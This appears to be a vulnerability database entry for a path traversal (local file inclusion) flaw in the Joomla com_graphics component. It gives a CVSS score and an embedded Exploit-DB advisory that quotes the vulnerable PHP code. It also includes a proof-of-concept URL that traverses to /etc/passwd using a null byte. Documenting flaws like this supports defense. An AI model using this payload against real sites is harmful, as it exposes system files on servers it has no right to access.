Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-22 |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 12430
Publication date : 2010-04-26 22h00 +00:00
Author : wishnusakti + inc0mp13te
EDB Verified : No
================================================================================================
Title : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
Vendor : http://htmlcoderhelper.com/
Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip
Date : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
================================================================================================
[+] Vulnerable
./components/com_graphics/graphics.php
// Require specific controller if requested
if($controller = JRequest::getVar( 'controller' )) {
require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
}
[+] Exploit
http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
================================================================================================
Very Special thanks :
Penghuni #nob0dy priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Bot² Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
to all my friends : mywisdom, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati,
cakill, krembis, biakkobar, hendri_note, xshadow, local_disaster, pradipta yoarsa
================================================================================================
# ./wishnusakti #.inc0mp13te
Products Mentioned
Configuraton 0
Htmlcoderhelper>>Com_graphics >> Version 1.0.6
Htmlcoderhelper>>Com_graphics >> Version 1.5.0
Joomla>>Joomla\! >> Version *
References